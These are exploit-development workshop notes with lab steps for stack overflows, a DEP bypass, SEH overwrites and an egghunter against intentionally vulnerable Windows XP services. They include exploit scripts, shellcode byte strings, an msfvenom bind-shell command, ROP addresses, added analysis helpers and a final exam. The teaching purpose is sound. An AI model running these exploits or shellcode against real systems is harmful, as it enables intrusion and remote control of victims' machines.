- Right-click on 1-simplefuzzer.py and choose the option edit with Notepad++


cd c:\Python27

c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.


- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.

- Now go to folder C:\Users\Student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\Student\Desktop\ExploitLab\4-AttackScripts and run 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).


- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

cd c:\Python27

c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\2-3000chars.py
  915.  
  916.  
  917.  
  918.  
  919. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  920.  
  921. cd c:\Python27>
  922.  
  923. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\2-3000chars.py
  924.  
  925.  
  926.  
  927.  
  928.  
  929. - Calculate the distance to EIP by running script 3-3000chars.py
  930. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  931.  
  932. cd c:\Python27>
  933.  
  934. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\3-3000chars.py
  935.  
  936.  
  937.  
  938.  
  939.  
  940. 4-count-chars-to-EIP.py
  941. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  942. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  943.  
  944. cd c:\Python27>
  945.  
  946. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\4-count-chars-to-EIP.py
  947.  
  948.  
  949.  
  950. 5-2006char-eip-check.py
  951. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  952.  
  953. cd c:\Python27>
  954.  
  955. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\5-2006char-eip-check.py
  956.  
  957.  
  958.  
  959. 6-jmp-esp.py
  960. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  961.  
  962. cd c:\Python27>
  963.  
  964. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\6-jmp-esp.py
  965.  
  966.  
  967.  
  968. 7-first-exploit
  969. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  970.  
  971. cd c:\Python27>
  972.  
  973.  
  974.  
  975. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\7-first-exploit.py



#########
# Day 4 #
#########
Please download this file to your Windows host machine, and extract it to your Desktop.
https://s3.amazonaws.com/infosecaddictsfiles/ED-Workshop-Files.zip



###########################
# Lab 1a: Stack Overflows #
###########################

#############################
# Start WarFTPd             #
# Start WinDBG              #
# Press F6                  #
# Attach to war-ftpd.exe    #
#############################
cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a


python warftpd1.py | nc XPSP3-ED-Target-IP 21

At WINDBG prompt
“r” to show registers or “alt+4”

dd esp


python warftpd2.py | nc XPSP3-ED-Target-IP 21


At WINDBG prompt
“r” to show registers or “alt+4”
dd esp

Eip: 32714131
esp: affd58 (71413471)

Now we need to SSH into the StrategicSec Ubuntu host

cd /home/strategicsec/toolz/metasploit/tools/exploit

ruby pattern_offset.rb 32714131
485

ruby pattern_offset.rb 71413471
493

Distance to EIP is: 485
Relative position of ESP is: 493

RET – POP EIP
RET 4 – POP EIP and shift ESP down by 4 bytes

cd /home/strategicsec/toolz/metasploit/
./msfpescan -j ESP DLLs/xpsp3/shell32.dll

0x7c9c167d push esp; retn 0x304d
0x7c9d30d7 jmp esp     <- how about we use this one
0x7c9d30eb jmp esp
0x7c9d30ff jmp esp


Open warftpd3.py with Notepad++
Fill in the appropriate values:
- Distance to EIP
- Address of JMP ESP


python warftpd3.py | nc XPSP3-ED-Target-IP 21

0:003> dd eip
0:003> dd esp


Mention bad characters
No debugger


python warftpd4.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444

-------------------------------------------------------------

There are 2 things that can go wrong with shellcode. The first thing is a lack of space, and the second is bad characters.

Shellcode test 1: Calculate space for shellcode
Look in the warftpd3.py script for the shellcode variable. Change the length of the shellcode being sent to test how much you can send before the CCs truncate.


Shellcode test 2: Identify bad characters

Replace the INT3 (cc) dummy shellcode with this string:
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

Send this new shellcode string and identify the places where it truncates - these are the bad characters


Here is what the string looks like after I manually tested and removed each of the bad characters:
shellcode = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"


./msfvenom -p windows/shell/bind_tcp -f python -b '\x00\x0a\x0d\x40'

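The bad-character test above is done by eye: send all 256 byte values, read the buffer back, see where the copy in memory stops matching, drop that byte and resend. The comparison itself is mechanical, so here it is as an added example (not part of the class notes). `fake_target_copy` is a constructed stand-in for reading the buffer back in the debugger: it stops at NUL like a C-string copy and strips 0x0a, 0x0d and 0x40, which is the set the notes arrived at and passed to msfvenom with `-b`. The same comparison, from the other side, is a cheap way to document what an input parser's filtering actually does.

```python
"""Find the bytes a service mangles by comparing sent vs. stored (added example)."""

BAD_CHAR_PROBE = bytes(range(256))   # \x00\x01...\xff, the probe string used above


def fake_target_copy(data):
    """Constructed stand-in for the target's copy of the buffer (what 'dd esp'
    would show): truncates at NUL and drops CR, LF and '@'."""
    cut = data.split(b"\x00", 1)[0]                      # C-string copy stops at NUL
    return bytes(b for b in cut if b not in (0x0a, 0x0d, 0x40))


def first_divergence(sent, observed):
    """Index where the stored copy stops matching what was sent, or None when
    the copy is intact. Truncation, dropped bytes and substituted bytes all
    show up here, because each of them breaks the byte-for-byte match."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return i
    return None


def find_bad_chars(send_and_read, probe=BAD_CHAR_PROBE):
    """The remove-and-resend loop: each round removes the first mangled byte
    from the probe and resends, until the copy comes back intact."""
    bad = []
    while True:
        i = first_divergence(probe, send_and_read(probe))
        if i is None:
            return sorted(bad)
        bad.append(probe[i])
        probe = probe.replace(bytes([probe[i]]), b"")


def as_msfvenom_arg(bad):
    """[0, 10, 13, 64] -> '\\x00\\x0a\\x0d\\x40', the form msfvenom -b expects."""
    return "".join("\\x%02x" % b for b in bad)


if __name__ == "__main__":
    found = find_bad_chars(fake_target_copy)
    print(found, as_msfvenom_arg(found))
```

Against a real service `send_and_read` is the slow part (send the probe, break in the debugger, dump the buffer); the loop is otherwise the same. One round per bad byte is enough because the first divergence is always the lowest mangled byte still present in the probe.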
###########################################
# Lab 1b: Stack Overflows with DEP Bypass #
###########################################

Reboot your target host and choose the "2nd" option for DEP.


cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b


python warftpd1.py | nc XPSP3-ED-Target-IP 21

At WINDBG prompt
“r” to show registers or “alt+4”

dd esp


python warftpd2.py | nc XPSP3-ED-Target-IP 21


At WINDBG prompt
“r” to show registers or “alt+4”
dd esp

Eip: 32714131
esp: affd58 (71413471)

Now we need to SSH into the StrategicSec Ubuntu host

cd /home/strategicsec/toolz/metasploit/tools/exploit

ruby pattern_offset.rb 32714131
485

ruby pattern_offset.rb 71413471
493


cd /home/strategicsec/toolz/metasploit/

./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7


python warftpd3.py | nc XPSP3-ED-Target-IP 21

0:003> dd eip
0:003> dd esp

INT3s - GOOD!!!!!!!


python warftpd4.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444


strategicsec....exploit no workie!!!!


Why????????? DEP!!!!!!!!!!!!!


Let's look through ole32.dll for the following instructions:

mov al,0x1
ret 0x4

We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.


./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll

[DLLs/xpsp3/ole32.dll]
0x775ee00e b001c204
0x775ee00e mov al, 1
0x775ee010 ret 4


Then we need to jump to the LdrpCheckNXCompatibility routine in
ntdll.dll that disables DEP.


Inside of ntdll.dll we need to find the following instructions:

CMP AL,1
PUSH 2
POP ESI
JE ntdll.7


./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll

[DLLs/xpsp3/ntdll.dll]
0x7c91cd24 3c016a025e0f84
0x7c91cd24 cmp al, 1
0x7c91cd26 push 2
0x7c91cd28 pop esi
0x7c91cd29 jz 7


This set of instructions checks that AL is set to 1, then 2 is pushed
on the stack and popped into ESI.


dep = "\x0e\xe0\x5e\x77"+\
      "\xff\xff\xff\xff"+\
      "\x24\xcd\x91\x7c"+\
      "\xff\xff\xff\xff"+\
      "A"*0x54


#############################
# Start WarFTPd             #
# Start WinDBG              #
# Press F6                  #
# Attach to war-ftpd.exe    #
# bp 0x775ee00e             #
# g                         #
#############################


python warftpd5.py | nc XPSP3-ED-Target-IP 21

---------------------------------------------------------------------------
We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.

mov al,0x1
ret 0x4


0:005> g
Breakpoint 0 hit
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=775ee00e esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
ole32!CSSMappedStream::IsWriteable:
775ee00e b001 mov al,1


0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=775ee010 esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
ole32!CSSMappedStream::IsWriteable+0x2:
775ee010 c20400 ret 4


---------------------------------------------------------------------------
Ok, so inside of ntdll.dll we need to find the following instructions:

CMP AL,1
PUSH 2
POP ESI
JE ntdll.7

0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=7c91cd24 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
ntdll!LdrpCheckNXCompatibility+0x13:
7c91cd24 3c01 cmp al,1


0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=7c91cd26 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!LdrpCheckNXCompatibility+0x15:
7c91cd26 6a02 push 2


0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=7c91cd28 esp=00affd5c ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!LdrpCheckNXCompatibility+0x17:
7c91cd28 5e pop esi


0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=00000002 edi=00affe58
eip=7c91cd29 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!LdrpCheckNXCompatibility+0x18:
7c91cd29 0f84df290200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93f70e) [br=1]


---------------------------------------------------------------------------


python warftpd5.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444

##########################
# Lab 1c: SEH Overwrites #
##########################

#################################################
# On our VictimXP Host (XPSP3-ED-Target-IP)     #
# Start sipXexPhone if it isn’t already running #
# Start WinDBG                                  #
# Press “F6” and Attach to sipXexPhone.exe      #
# Press “F5” to start the debugger              #
#################################################


cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1c\sipx_complete


python sipex0.py XPSP3-ED-Target-IP

0:003> !exchain
0:003> dds esp
0:003> dds

python sipex1.py XPSP3-ED-Target-IP

0:003> !exchain
0:003> g

When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.


python sipex2.py XPSP3-ED-Target-IP

0:003> !exchain
0:003> g


***ssh into instructor Ubuntu host***
cd /home/strategicsec/toolz/metasploit/tools/exploit
ruby pattern_offset.rb 41346941     <- We should see that SEH is at 252


!load narly
!nmod

***ssh into the Ubuntu host***
ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
cd /home/strategicsec/toolz/metasploit/
./msfpescan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
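`!nmod` from narly lists, per loaded module, which mitigations the module opted into, and that is the first thing to check on both of the last two labs: Lab 1b drives LdrpCheckNXCompatibility, which the notes describe as turning DEP off, and an SEH overwrite like Lab 1c needs a module without SafeSEH. Most of what `!nmod` shows comes from one 16-bit field in the PE optional header, DllCharacteristics, where a module declares NX_COMPAT (DEP) and DYNAMIC_BASE (ASLR). The parser below is an added example, not part of the class notes or of narly; `build_minimal_pe` is a constructed header-only image so it can run offline, and SafeSEH, which lives in the Load Configuration directory rather than in this field, is not parsed here.

```python
"""Read a PE module's mitigation opt-in flags (DllCharacteristics). Added example."""
import struct

DLL_CHARACTERISTICS = {          # IMAGE_DLLCHARACTERISTICS_* bit values from winnt.h
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",      # ASLR opt-in
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",         # DEP opt-in
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",            # image declares it uses no SEH handlers at all
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def dll_characteristics(image):
    """Return (raw_flags, [flag names]) from the bytes of a PE file."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]      # offset of the PE signature
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                  # skip signature and 20-byte COFF file header
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic not in (0x10B, 0x20B):          # PE32 / PE32+
        raise ValueError("unexpected optional header magic 0x%x" % magic)
    flags = struct.unpack_from("<H", image, opt + 70)[0]     # same offset in PE32 and PE32+
    names = [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if flags & bit]
    return flags, names


def mitigations(image):
    """The questions to ask before trusting a module: DEP, ASLR, CFG opted in?"""
    flags, _ = dll_characteristics(image)
    return {"DEP": bool(flags & 0x0100),
            "ASLR": bool(flags & 0x0040),
            "CFG": bool(flags & 0x4000)}


def mitigations_of_file(path):
    with open(path, "rb") as f:
        return mitigations(f.read())


def build_minimal_pe(flags, pe32plus=False):
    """Constructed for this example: a header-only PE image (no sections, not
    loadable) carrying the given DllCharacteristics, so the parser has input."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)   # 64 bytes
    machine = 0x8664 if pe32plus else 0x14C
    opt_size = 240 if pe32plus else 224
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (DLL | EXECUTABLE | 32BIT)
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, flags)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    print(dll_characteristics(build_minimal_pe(0x0140)))
    print(mitigations(build_minimal_pe(0)))
```

Point `mitigations_of_file` at any module from the lab DLL directory to see what the target binaries declare; a module with neither NX_COMPAT nor DYNAMIC_BASE is exactly the kind of module the JMP ESP and POP/POP/RET searches above rely on.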


#####################################
# sipex3.py in Notepad++.           #
# Set cseq = 252                    #
# Set seh2 address to: 0x10015977   #
#####################################


python sipex3.py XPSP3-ED-Target-IP
0:003> !exchain

python sipex4.py XPSP3-ED-Target-IP


nc XPSP3-ED-Target-IP 4444


Brush up on the basics of Structured Exception Handlers:
http://www.securitytube.net/video/1406
http://www.securitytube.net/video/1407
http://www.securitytube.net/video/1408


Here are the slides for the exploit dev basics:
https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+1+-+Getting+Started.pptx
https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+2+-+The+Process.pptx
https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+4+-+Windows+Stack+Overflows.pptx


Here are the exploit dev basic videos:
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-01+20.21+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-03+19.11+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-08+19.10+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-10+19.03+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-17+19.13+Exploit+Dev+Night+School+October+2013.wmv


########################################
# Lab 2a: Not Enough Space (Egghunter) #
########################################

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton

SWS - SIMPLE WEB SERVER
-----------------------

Running SWS on Strategicsec-XP-ED-Target-VM
Start > Programs > Simple Web Server (it's in the middle somewhere)
Red icon in system tray
Double click it
- it will pop up a menu
- select "start"
- dialog box shows starting params - port 82

WinDBG
- attach to "server.exe"


python sws1.py | nc XPSP3-ED-Target-IP 82


python sws2.py | nc XPSP3-ED-Target-IP 82


SSH into the Ubuntu host (user: strategicsec / pass: strategicsec)
cd /home/strategicsec/toolz/metasploit/tools/exploit
ruby pattern_offset.rb 41356841     <- You should see that EIP is at 225
ruby pattern_offset.rb 68413668     <- You should see that ESP is at 229
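Every lab so far has leaned on `pattern_offset.rb` for one number (396F4338 -> 2006 in the vulnserver steps, 32714131 -> 485 and 71413471 -> 493 in Lab 1a, 41346941 -> 252 in Lab 1c, 41356841 -> 225 and 68413668 -> 229 here) without showing what it computes. As an added example, not part of the class notes or of Metasploit, this regenerates the non-repeating pattern that `pattern_create.rb` emits and looks a register value up in it. The register holds its four bytes little-endian, so 396F4338 is the substring "8Co9" (38 43 6F 39), which is exactly the search the 4-count-chars-to-EIP step describes. This is crash triage: it answers which bytes of a fuzz input reached a register, so the numbers above can be checked rather than trusted.

```python
"""Regenerate the Metasploit cyclic pattern and look register values up in it (added example)."""
import string
import struct

MAX_PATTERN = 26 * 26 * 10 * 3   # the pattern would start repeating after 20280 bytes


def pattern_create(length):
    """Build 'Aa0Aa1Aa2...': 3-byte groups of Upper+lower+digit, the digit
    cycling fastest, then the lowercase letter, then the uppercase letter
    (same default character sets and order as pattern_create.rb)."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would repeat beyond %d bytes" % MAX_PATTERN)
    groups = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                groups.append(upper + lower + digit)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length]
    return "".join(groups)[:length]


def register_to_needle(value):
    """'396F4338' (or the int 0x396F4338) -> '8Co9': the bytes in memory order,
    i.e. the substring of the input that landed in the register."""
    if isinstance(value, str):
        value = int(value, 16)
    return struct.pack("<I", value).decode("latin-1")


def pattern_offset(value, length=MAX_PATTERN):
    """Offset of the register's bytes inside the pattern, or -1 if the value
    did not come from the pattern (register not overwritten, or partially)."""
    return pattern_create(length).find(register_to_needle(value))


if __name__ == "__main__":
    for reg in ("396F4338", "32714131", "71413471", "41346941", "41356841", "68413668"):
        print(reg, register_to_needle(reg), pattern_offset(reg))
```

A result of -1 is informative too: 41414141 is "AAAA", which cannot occur in the pattern, so a register showing it was filled by the plain "A" padding (as in the sipex1.py step) and not by the pattern.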


EGGHUNTER:
----------

"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
         ^^^^^^^^^^^^^^^^                                ^^^^^^^^
         ABBA                                            JMP ESP

GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)


-----sws3.py-----
#!/usr/bin/python2

import os      # for output setting
import sys
import struct  # for pack function

# turn off output buffer and set binary mode
sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)


pad = "A" * 225     # distance to EIP
eip = 0x7e429353    # replace EIP to point to "jmp esp" from user32.dll

egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

shellcode = "\xCC" * 700

buf = "GET /"
buf += pad + struct.pack('<I', eip) + egghunter
buf += " HTTP/1.0\r\n"
buf += "User-Agent: ABBAABBA"
buf += shellcode
buf += " HTTP/1.0\r\n"

sys.stdout.write(buf)
-----


####################
# Day 5 Final Exam #
####################


Section 1: Secure Coding
------------------------


Section 1a: Secure C/C++
------------------------
https://s3.amazonaws.com/infosecaddictsfiles/F200.03c-Common-Vulnerabilities-in-C-and-C%2B%2B.ppt
Review slides:
4 - 17
24 - 31

1. The majority of buffer overflows are related to "_____________"
2. Using the >> operator in C++ with native C strings is just as dangerous as "_____________".
3. The "_____________" versions of functions, such as strncpy(), are headed in the right direction. But there are still plenty of misuse and abuse cases that either lead to buffer overflows
4. The "_____________" function is misleading because it doesn't accept a bound on the total size of the destination buffer, but rather the remaining space available in the destination buffer
5. List 10 "Always Dangerous" functions or "banned API" and each function's corresponding "Safe C and C++ Library" replacement


Section 1b: Secure Java
-----------------------
https://s3.amazonaws.com/infosecaddictsfiles/F200.03j-Common-Vulnerabilities-in-Java.ppt
Review slides:
34 - 58
70 - 85

1. In pairs, use "_____________". Takes a tainted string, returns a clean string.
2. If outputting normal text, use "_____________". Simple and secure.
3. If outputting inside a non-text tag, use "_____________".
4. Stored procedure gives "_____________". Implement with "_____________".
5. For parameters, use a "_____________". Simple and secure. For non-parameters, use "_____________".


Section 1c: Secure .Net
-----------------------
https://s3.amazonaws.com/infosecaddictsfiles/F200.03n-Common-Vulnerabilities-in-dot-Net.ppt
Review slides:
34 - 47
49 - 60
89 - 103

1. In pairs, use "_____________". Takes a tainted string, returns a clean string.
2. List the 7 AntiXss Library Functions and when they should be used.
3. In pairs, write "_____________". Returns a safe value. Throws ValidationException if no safe value is found
4. In pairs, use "_____________" to fix command injection.
   Takes user data
   Returns legal value or throws ValidationException
5. List the 3 "Harder to Fix" Command Injection items


Section 2: Web Application Security Testing
-------------------------------------------

Perform a web application security assessment against the following URL:
http://zero.webappsecurity.com

Task 2a: Create a web application security test report similar to the reports found in the link below:
https://s3.amazonaws.com/infosecaddictsfiles/WebAppSampleReports.zip

Task 2b: Create a document to prove that you properly tested the website for the OWASP Top 10 vulnerabilities similar to the report found in the link below:
https://s3.amazonaws.com/infosecaddictsfiles/OWASP-Top-10-Proof_Draft_Update.docx


Section 3: Exploit Development
------------------------------

Task 3a: Analyze and comment the exploit code found at https://www.exploit-db.com/exploits/23243/ (ensure all components of this exploit code are thoroughly explained)


Task 3b: Create a working exploit for FreeFloat FTP
Use the war-ftp exploit code for reference and the Windows XP virtual machine as the target system.
Download and install FreeFloat FTP Server to the target Windows XP virtual machine and create a working exploit.


Vulnerable FreeFloat FTP Server download link:
https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip

FreeFloat FTP Server reference code:
https://www.exploit-db.com/exploits/23243/